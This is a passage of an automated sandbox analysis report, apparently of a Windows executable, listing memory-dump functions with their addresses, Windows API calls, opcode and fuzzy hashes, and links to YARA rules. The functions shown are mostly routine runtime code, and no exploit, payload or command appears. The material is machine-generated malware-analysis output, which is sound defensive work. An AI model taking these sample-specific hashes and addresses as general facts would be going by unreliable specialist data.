                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 3548387204-0
                                                                                                                                                                      • Opcode ID: f3c12bdc4f7d7c778645967525d23d05ba21d1374075e8d504579f5c04d654ad
                                                                                                                                                                      • Instruction ID: 999d9253f918757d0a7f59d5a1ee12cd84116dadee55899feabdb8dd6da5f310
                                                                                                                                                                      • Opcode Fuzzy Hash: f3c12bdc4f7d7c778645967525d23d05ba21d1374075e8d504579f5c04d654ad
                                                                                                                                                                      • Instruction Fuzzy Hash: B2116A54E08103C1FAB877B157562B801856FA4749F840C3CEA5DDA2D3EEAFFC41E26A
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00007FF686051FA4, Relevance: 1.6, APIs: 1, Instructions: 53COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000000D.00000002.267325262.00007FF686041000.00000020.00020000.sdmp, Offset: 00007FF686040000, based on PE: true
                                                                                                                                                                      • Associated: 0000000D.00000002.267319649.00007FF686040000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 0000000D.00000002.267351690.00007FF68606C000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 0000000D.00000002.267394960.00007FF686080000.00000004.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 0000000D.00000002.267403246.00007FF686084000.00000002.00020000.sdmp Download File
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: HandleModule$AddressFreeLibraryProc
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 3947729631-0
                                                                                                                                                                      • Opcode ID: e425f939b461e09f0642d912a4c298c6d0487223980a7e59e57d9a8a5d610ba6
                                                                                                                                                                      • Instruction ID: 6c74b7b215fe9c5095fd8d868e8a81756a79b18d7fb93b315c6bdebbb2d5cef9
                                                                                                                                                                      • Opcode Fuzzy Hash: e425f939b461e09f0642d912a4c298c6d0487223980a7e59e57d9a8a5d610ba6
                                                                                                                                                                      • Instruction Fuzzy Hash: 33215E32E05B41CAFB119F64C5993FD36A0FF44708F84553ADA0DA2A86DF3AD985CB84
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00007FF68605FAB4, Relevance: 1.5, APIs: 1, Instructions: 47COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000000D.00000002.267325262.00007FF686041000.00000020.00020000.sdmp, Offset: 00007FF686040000, based on PE: true
                                                                                                                                                                      • Associated: 0000000D.00000002.267319649.00007FF686040000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 0000000D.00000002.267351690.00007FF68606C000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 0000000D.00000002.267394960.00007FF686080000.00000004.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 0000000D.00000002.267403246.00007FF686084000.00000002.00020000.sdmp Download File
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: _invalid_parameter_noinfo
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 3215553584-0
                                                                                                                                                                      • Opcode ID: 5a7425f769f0ef5d05a00a5751305ae3355cb41b9d71f6080b861222f13c97f2
                                                                                                                                                                      • Instruction ID: 5df28d131aa9d1811a588da92bb1aa8bae5263ee54c6105d8e649ca6ff270dec
                                                                                                                                                                      • Opcode Fuzzy Hash: 5a7425f769f0ef5d05a00a5751305ae3355cb41b9d71f6080b861222f13c97f2
                                                                                                                                                                      • Instruction Fuzzy Hash: AA116A36918642C2F610AF14AA59479B3A5FF80740F15063DE65DE77A6CF3EEC10CB48
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00007FF68605AD8C, Relevance: 1.5, APIs: 1, Instructions: 36memoryCOMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • RtlAllocateHeap.NTDLL(?,?,00000000,00007FF68605AC55,?,?,8000000000000000,00007FF686056A2D,?,?,?,?,00007FF68605AE29), ref: 00007FF68605ADE1
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000000D.00000002.267325262.00007FF686041000.00000020.00020000.sdmp, Offset: 00007FF686040000, based on PE: true
                                                                                                                                                                      • Associated: 0000000D.00000002.267319649.00007FF686040000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 0000000D.00000002.267351690.00007FF68606C000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 0000000D.00000002.267394960.00007FF686080000.00000004.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 0000000D.00000002.267403246.00007FF686084000.00000002.00020000.sdmp Download File
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: AllocateHeap
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 1279760036-0
                                                                                                                                                                      • Opcode ID: fe3263e8e25c2df92887862d28651b12063e121c712c013a3fb717dcdb45fcec
                                                                                                                                                                      • Instruction ID: 2e90a469fb4ee35dcf1e9f3247a1e1fd2edcf5c32391d0fe7f0ac98a3ff6e6b0
                                                                                                                                                                      • Opcode Fuzzy Hash: fe3263e8e25c2df92887862d28651b12063e121c712c013a3fb717dcdb45fcec
                                                                                                                                                                      • Instruction Fuzzy Hash: CEF04954B4D206C1FE6466619B593B522987F88B81F0C5438CD0FEA6D2DE1EAC81C328
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00007FF68606BBD0, Relevance: 1.5, APIs: 1, Instructions: 15COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000000D.00000002.267325262.00007FF686041000.00000020.00020000.sdmp, Offset: 00007FF686040000, based on PE: true
                                                                                                                                                                      • Associated: 0000000D.00000002.267319649.00007FF686040000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 0000000D.00000002.267351690.00007FF68606C000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 0000000D.00000002.267394960.00007FF686080000.00000004.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 0000000D.00000002.267403246.00007FF686084000.00000002.00020000.sdmp Download File
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: DecodePointer
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 3527080286-0
                                                                                                                                                                      • Opcode ID: 341e8ee344b5f2fdde741966d8bcbf607ed47ed757ea4cefe913e01fcc8f9455
                                                                                                                                                                      • Instruction ID: c7aad8147c0603057de650a1edbc5a5b4e73de3f8466277dbbe53c7d8851423c
                                                                                                                                                                      • Opcode Fuzzy Hash: 341e8ee344b5f2fdde741966d8bcbf607ed47ed757ea4cefe913e01fcc8f9455
                                                                                                                                                                      • Instruction Fuzzy Hash: 32E0B665E59B02C0EA549B06AE841383265BF59745F901439C60EC2370DF6EA8E9C70D
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Non-executed Functions

                                                                                                                                                                      Function 00007FF686061A90, Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 222COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                        • Part of subcall function 00007FF68605AA7C: GetLastError.KERNEL32(?,?,?,00007FF68604FD01,?,?,7FFFFFFFFFFFFFFF,00007FF686041C2A), ref: 00007FF68605AA8B
                                                                                                                                                                        • Part of subcall function 00007FF68605AA7C: SetLastError.KERNEL32(?,?,?,00007FF68604FD01,?,?,7FFFFFFFFFFFFFFF,00007FF686041C2A), ref: 00007FF68605AB29
                                                                                                                                                                      • TranslateName.LIBCMT ref: 00007FF686061AFD
                                                                                                                                                                      • TranslateName.LIBCMT ref: 00007FF686061B38
                                                                                                                                                                      • GetACP.KERNEL32(?,?,?,00000000,00000092,00007FF68605386C), ref: 00007FF686061B7D
                                                                                                                                                                      • IsValidCodePage.KERNEL32(?,?,?,00000000,00000092,00007FF68605386C), ref: 00007FF686061BA5
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000000D.00000002.267325262.00007FF686041000.00000020.00020000.sdmp, Offset: 00007FF686040000, based on PE: true
                                                                                                                                                                      • Associated: 0000000D.00000002.267319649.00007FF686040000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 0000000D.00000002.267351690.00007FF68606C000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 0000000D.00000002.267394960.00007FF686080000.00000004.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 0000000D.00000002.267403246.00007FF686084000.00000002.00020000.sdmp Download File
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: ErrorLastNameTranslate$CodePageValid
                                                                                                                                                                      • String ID: utf8
                                                                                                                                                                      • API String ID: 2136749100-905460609
                                                                                                                                                                      • Opcode ID: 908a6b83db4800547fb9010b45ec8f8f957cca1a06787f528ca73239330b9321
                                                                                                                                                                      • Instruction ID: 80e74729b839a0518aade2c41a30069a9a8a1633aaeeb8723fb0bed5d6e57278
                                                                                                                                                                      • Opcode Fuzzy Hash: 908a6b83db4800547fb9010b45ec8f8f957cca1a06787f528ca73239330b9321
                                                                                                                                                                      • Instruction Fuzzy Hash: 78919A32A08742C2EB249BA6D6012B923A4FF44B85F444179DB4DC7792EF3EED91C308
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00007FF6860624C4, Relevance: 10.7, APIs: 7, Instructions: 171COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000000D.00000002.267325262.00007FF686041000.00000020.00020000.sdmp, Offset: 00007FF686040000, based on PE: true
                                                                                                                                                                      • Associated: 0000000D.00000002.267319649.00007FF686040000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 0000000D.00000002.267351690.00007FF68606C000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 0000000D.00000002.267394960.00007FF686080000.00000004.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 0000000D.00000002.267403246.00007FF686084000.00000002.00020000.sdmp Download File
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Locale$CodeErrorInfoLastPageValid$DefaultEnumLocalesProcessSystemUser
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 3939093798-0
                                                                                                                                                                      • Opcode ID: f790281d0b45084633252d64efd2133bc657d527af11988ede220f6fc86663f8
                                                                                                                                                                      • Instruction ID: bcc1bc44fe72976321690e61b065d9dc428bafe2f00ed398ee60a2a48604d8ca
                                                                                                                                                                      • Opcode Fuzzy Hash: f790281d0b45084633252d64efd2133bc657d527af11988ede220f6fc86663f8
                                                                                                                                                                      • Instruction Fuzzy Hash: EA715922F08702C9FB259F60DA516B923A0BF48784F448139CF0D97699EF3EAD85C319
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00007FF686048064, Relevance: 10.6, APIs: 7, Instructions: 72COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000000D.00000002.267325262.00007FF686041000.00000020.00020000.sdmp, Offset: 00007FF686040000, based on PE: true
                                                                                                                                                                      • Associated: 0000000D.00000002.267319649.00007FF686040000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 0000000D.00000002.267351690.00007FF68606C000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 0000000D.00000002.267394960.00007FF686080000.00000004.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 0000000D.00000002.267403246.00007FF686084000.00000002.00020000.sdmp Download File
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 3140674995-0
                                                                                                                                                                      • Opcode ID: dd01e66c30db8e9f87cd60ad336a0cb77522f9690efad85c2707880cc22c2aab
                                                                                                                                                                      • Instruction ID: 425838967ce1745ced3b1c37517ea36d75f4bd7e2e1f6932e561eeeb38095b04
                                                                                                                                                                      • Opcode Fuzzy Hash: dd01e66c30db8e9f87cd60ad336a0cb77522f9690efad85c2707880cc22c2aab
                                                                                                                                                                      • Instruction Fuzzy Hash: 6F316C72609B81CAEB708F60E8903E93364FB94748F44443ADB4E87A99DF79D948C714
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00007FF68604FEC8, Relevance: 9.1, APIs: 6, Instructions: 83COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000000D.00000002.267325262.00007FF686041000.00000020.00020000.sdmp, Offset: 00007FF686040000, based on PE: true
                                                                                                                                                                      • Associated: 0000000D.00000002.267319649.00007FF686040000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 0000000D.00000002.267351690.00007FF68606C000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 0000000D.00000002.267394960.00007FF686080000.00000004.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 0000000D.00000002.267403246.00007FF686084000.00000002.00020000.sdmp Download File
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 1239891234-0
                                                                                                                                                                      • Opcode ID: e738eda3dbc1fab1b558436e85e0f414863e30d97480f66e19cff1ca9febbf30
                                                                                                                                                                      • Instruction ID: 6dfa7319683b0d3795499b195d84d9f57f5bf3ab9d818e4f5897418287b48c34
                                                                                                                                                                      • Opcode Fuzzy Hash: e738eda3dbc1fab1b558436e85e0f414863e30d97480f66e19cff1ca9febbf30
                                                                                                                                                                      • Instruction Fuzzy Hash: CC314D32618B81C6E770CF25E9403AA73A0FF99758F50013AEA9D83B59DF79D945CB04
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00007FF686062B4C, Relevance: 7.8, APIs: 5, Instructions: 328fileCOMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000000D.00000002.267325262.00007FF686041000.00000020.00020000.sdmp, Offset: 00007FF686040000, based on PE: true
                                                                                                                                                                      • Associated: 0000000D.00000002.267319649.00007FF686040000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 0000000D.00000002.267351690.00007FF68606C000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 0000000D.00000002.267394960.00007FF686080000.00000004.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 0000000D.00000002.267403246.00007FF686084000.00000002.00020000.sdmp Download File
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: ErrorFileLastWrite$ConsoleOutput
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 1443284424-0
                                                                                                                                                                      • Opcode ID: a3ee30757392479f5a7cce126f2a8e91cadbc6b924d7436d729ce31afda1fd9e
                                                                                                                                                                      • Instruction ID: 1f825b039502e2584293b2f9b1e702e1ee452e459e27216db4b19fb49e55af17
                                                                                                                                                                      • Opcode Fuzzy Hash: a3ee30757392479f5a7cce126f2a8e91cadbc6b924d7436d729ce31afda1fd9e
                                                                                                                                                                      • Instruction Fuzzy Hash: 54E10062B08781DAE710CF64D6402AD7BB1FB45788F10413AEF4E97B99DE39D986C704
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00007FF686043C20, Relevance: 5.7, APIs: 2, Strings: 1, Instructions: 497COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000000D.00000002.267325262.00007FF686041000.00000020.00020000.sdmp, Offset: 00007FF686040000, based on PE: true
                                                                                                                                                                      • Associated: 0000000D.00000002.267319649.00007FF686040000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 0000000D.00000002.267351690.00007FF68606C000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 0000000D.00000002.267394960.00007FF686080000.00000004.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 0000000D.00000002.267403246.00007FF686084000.00000002.00020000.sdmp Download File
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: _invalid_parameter_noinfo_noreturn
                                                                                                                                                                      • String ID: %
                                                                                                                                                                      • API String ID: 3668304517-2567322570
                                                                                                                                                                      • Opcode ID: 8a66d5076b83e9d492563f899b77351946d8774d763da9b8404ba780dddf6097
                                                                                                                                                                      • Instruction ID: 3dd747cb2a27719e21d80c56ad314ffaa9ee5050a50cdaa7d19f79d86181e5e9
                                                                                                                                                                      • Opcode Fuzzy Hash: 8a66d5076b83e9d492563f899b77351946d8774d763da9b8404ba780dddf6097
                                                                                                                                                                      • Instruction Fuzzy Hash: E1120E22B08A85C9FB398B66E5403BD6761FF64788F044139DE4D9BB89DE7DD840C388
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00007FF68605EF2C, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 35COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000000D.00000002.267325262.00007FF686041000.00000020.00020000.sdmp, Offset: 00007FF686040000, based on PE: true
                                                                                                                                                                      • Associated: 0000000D.00000002.267319649.00007FF686040000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 0000000D.00000002.267351690.00007FF68606C000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 0000000D.00000002.267394960.00007FF686080000.00000004.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 0000000D.00000002.267403246.00007FF686084000.00000002.00020000.sdmp Download File
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: InfoLocaletry_get_function
                                                                                                                                                                      • String ID: GetLocaleInfoEx
                                                                                                                                                                      • API String ID: 2200034068-2904428671
                                                                                                                                                                      • Opcode ID: eee715fbac3006e22b13ca4ea214737d10d3c8228fae26dd80626aacc3aa4420
                                                                                                                                                                      • Instruction ID: a10b118913f20ff2d4836e12edf480426529a235e8c07e10214ba43ede57f0b2
                                                                                                                                                                      • Opcode Fuzzy Hash: eee715fbac3006e22b13ca4ea214737d10d3c8228fae26dd80626aacc3aa4420
                                                                                                                                                                      • Instruction Fuzzy Hash: 92018625B08B81C2F7049B52BA405A9A770BF84BD0F589139EF4C93755CE3DED41C788
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00007FF686061F44, Relevance: 4.7, APIs: 3, Instructions: 169COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                        • Part of subcall function 00007FF68605AA7C: GetLastError.KERNEL32(?,?,?,00007FF68604FD01,?,?,7FFFFFFFFFFFFFFF,00007FF686041C2A), ref: 00007FF68605AA8B
                                                                                                                                                                        • Part of subcall function 00007FF68605AA7C: SetLastError.KERNEL32(?,?,?,00007FF68604FD01,?,?,7FFFFFFFFFFFFFFF,00007FF686041C2A), ref: 00007FF68605AB29
                                                                                                                                                                      • GetLocaleInfoW.KERNEL32 ref: 00007FF686061FB0
                                                                                                                                                                        • Part of subcall function 00007FF686065FD0: _invalid_parameter_noinfo.LIBCMT ref: 00007FF686065FED
                                                                                                                                                                      • GetLocaleInfoW.KERNEL32 ref: 00007FF686061FF9
                                                                                                                                                                        • Part of subcall function 00007FF686065FD0: _invalid_parameter_noinfo.LIBCMT ref: 00007FF686066046
                                                                                                                                                                      • GetLocaleInfoW.KERNEL32 ref: 00007FF6860620C4
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000000D.00000002.267325262.00007FF686041000.00000020.00020000.sdmp, Offset: 00007FF686040000, based on PE: true
                                                                                                                                                                      • Associated: 0000000D.00000002.267319649.00007FF686040000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 0000000D.00000002.267351690.00007FF68606C000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 0000000D.00000002.267394960.00007FF686080000.00000004.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 0000000D.00000002.267403246.00007FF686084000.00000002.00020000.sdmp Download File
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: InfoLocale$ErrorLast_invalid_parameter_noinfo
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 3644580040-0
                                                                                                                                                                      • Opcode ID: dc05ee9d306c6e0ffdd3ac43edc9ced9a5437f0b308a59e96cc22853e666dd7d
                                                                                                                                                                      • Instruction ID: 4e1affe8108302d6253a44ea2b8cbe6c10eed6f427265d185c5231656857f48f
                                                                                                                                                                      • Opcode Fuzzy Hash: dc05ee9d306c6e0ffdd3ac43edc9ced9a5437f0b308a59e96cc22853e666dd7d
                                                                                                                                                                      • Instruction Fuzzy Hash: 47619B72A08602C6EB348F21DA522B973A1FF94740F448139DB9ED7696DE3EED91C704
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00007FF68605D1B8, Relevance: 1.6, APIs: 1, Instructions: 146COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000000D.00000002.267325262.00007FF686041000.00000020.00020000.sdmp, Offset: 00007FF686040000, based on PE: true
                                                                                                                                                                      • Associated: 0000000D.00000002.267319649.00007FF686040000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 0000000D.00000002.267351690.00007FF68606C000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 0000000D.00000002.267394960.00007FF686080000.00000004.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 0000000D.00000002.267403246.00007FF686084000.00000002.00020000.sdmp Download File
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID:
                                                                                                                                                                      • Opcode ID: ffc4100ec5768e250a435d06c14c56274baa1edbd8c4cb733c689fc67547e2a7
                                                                                                                                                                      • Instruction ID: 6a3572c835336069aae8379509209e0fdd21740c020eb608f5710eaa9f47c1b7
                                                                                                                                                                      • Opcode Fuzzy Hash: ffc4100ec5768e250a435d06c14c56274baa1edbd8c4cb733c689fc67547e2a7
                                                                                                                                                                      • Instruction Fuzzy Hash: 4651E722B08791C5F7209B76AA042AD7BA5BF407D4F144239EE5D97AC5CF3DD941C708
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00007FF686062190, Relevance: 1.6, APIs: 1, Instructions: 70COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                        • Part of subcall function 00007FF68605AA7C: GetLastError.KERNEL32(?,?,?,00007FF68604FD01,?,?,7FFFFFFFFFFFFFFF,00007FF686041C2A), ref: 00007FF68605AA8B
                                                                                                                                                                        • Part of subcall function 00007FF68605AA7C: SetLastError.KERNEL32(?,?,?,00007FF68604FD01,?,?,7FFFFFFFFFFFFFFF,00007FF686041C2A), ref: 00007FF68605AB29
                                                                                                                                                                      • GetLocaleInfoW.KERNEL32 ref: 00007FF6860621F8
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000000D.00000002.267325262.00007FF686041000.00000020.00020000.sdmp, Offset: 00007FF686040000, based on PE: true
                                                                                                                                                                      • Associated: 0000000D.00000002.267319649.00007FF686040000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 0000000D.00000002.267351690.00007FF68606C000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 0000000D.00000002.267394960.00007FF686080000.00000004.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 0000000D.00000002.267403246.00007FF686084000.00000002.00020000.sdmp Download File
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: ErrorLast$InfoLocale
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 3736152602-0
                                                                                                                                                                      • Opcode ID: 9c959affe6facb76fbde4a24688696ddbe9eb53310224242d0ea281fc088afcf
                                                                                                                                                                      • Instruction ID: 22643db41cb4c8dee140dc64438f4a31a92c752bdb81e5da8dccbf8c9e6508fb
                                                                                                                                                                      • Opcode Fuzzy Hash: 9c959affe6facb76fbde4a24688696ddbe9eb53310224242d0ea281fc088afcf
                                                                                                                                                                      • Instruction Fuzzy Hash: 6C317E32A18783C6EB248B21E6423AA63A0FF88784F408139DB4DC3295DF2DED90C704
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00007FF686061DDC, Relevance: 1.6, APIs: 1, Instructions: 61COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                        • Part of subcall function 00007FF68605AA7C: GetLastError.KERNEL32(?,?,?,00007FF68604FD01,?,?,7FFFFFFFFFFFFFFF,00007FF686041C2A), ref: 00007FF68605AA8B
                                                                                                                                                                        • Part of subcall function 00007FF68605AA7C: SetLastError.KERNEL32(?,?,?,00007FF68604FD01,?,?,7FFFFFFFFFFFFFFF,00007FF686041C2A), ref: 00007FF68605AB29
                                                                                                                                                                      • EnumSystemLocalesW.KERNEL32(?,?,?,00007FF6860625C7,?,00000000,00000092,?,?,00000000,?,00007FF686053865), ref: 00007FF686061E7A
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000000D.00000002.267325262.00007FF686041000.00000020.00020000.sdmp, Offset: 00007FF686040000, based on PE: true
                                                                                                                                                                      • Associated: 0000000D.00000002.267319649.00007FF686040000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 0000000D.00000002.267351690.00007FF68606C000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 0000000D.00000002.267394960.00007FF686080000.00000004.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 0000000D.00000002.267403246.00007FF686084000.00000002.00020000.sdmp Download File
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: ErrorLast$EnumLocalesSystem
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 2417226690-0
                                                                                                                                                                      • Opcode ID: 574ff80e7cbefe62955d82931a8be5b1dad0593c08c4b232d84937cfd8c70f95
                                                                                                                                                                      • Instruction ID: 28b617913a5bcc737c1feb54356a82aa943d06ac8aae1cf0b1d6750883249857
                                                                                                                                                                      • Opcode Fuzzy Hash: 574ff80e7cbefe62955d82931a8be5b1dad0593c08c4b232d84937cfd8c70f95
                                                                                                                                                                      • Instruction Fuzzy Hash: 1811D263E08745CAEB148F69D2402A877A0FF90BA1F448139C719833D0DE79D9D1C740
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00007FF686062398, Relevance: 1.6, APIs: 1, Instructions: 50COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                        • Part of subcall function 00007FF68605AA7C: GetLastError.KERNEL32(?,?,?,00007FF68604FD01,?,?,7FFFFFFFFFFFFFFF,00007FF686041C2A), ref: 00007FF68605AA8B
                                                                                                                                                                        • Part of subcall function 00007FF68605AA7C: SetLastError.KERNEL32(?,?,?,00007FF68604FD01,?,?,7FFFFFFFFFFFFFFF,00007FF686041C2A), ref: 00007FF68605AB29
                                                                                                                                                                      • GetLocaleInfoW.KERNEL32(?,?,?,00007FF686062141), ref: 00007FF6860623CF
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000000D.00000002.267325262.00007FF686041000.00000020.00020000.sdmp, Offset: 00007FF686040000, based on PE: true
                                                                                                                                                                      • Associated: 0000000D.00000002.267319649.00007FF686040000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 0000000D.00000002.267351690.00007FF68606C000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 0000000D.00000002.267394960.00007FF686080000.00000004.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 0000000D.00000002.267403246.00007FF686084000.00000002.00020000.sdmp Download File
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: ErrorLast$InfoLocale
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 3736152602-0
                                                                                                                                                                      • Opcode ID: 9ebf8929b0ab0c94907b25fb4bdad8593e1245d25846e2b482df8f353ac1e275
                                                                                                                                                                      • Instruction ID: 63a0f7f8b3529a7cb331aafbd0875bd10c825e94aaf4d442e0efaea9b5105c42
                                                                                                                                                                      • Opcode Fuzzy Hash: 9ebf8929b0ab0c94907b25fb4bdad8593e1245d25846e2b482df8f353ac1e275
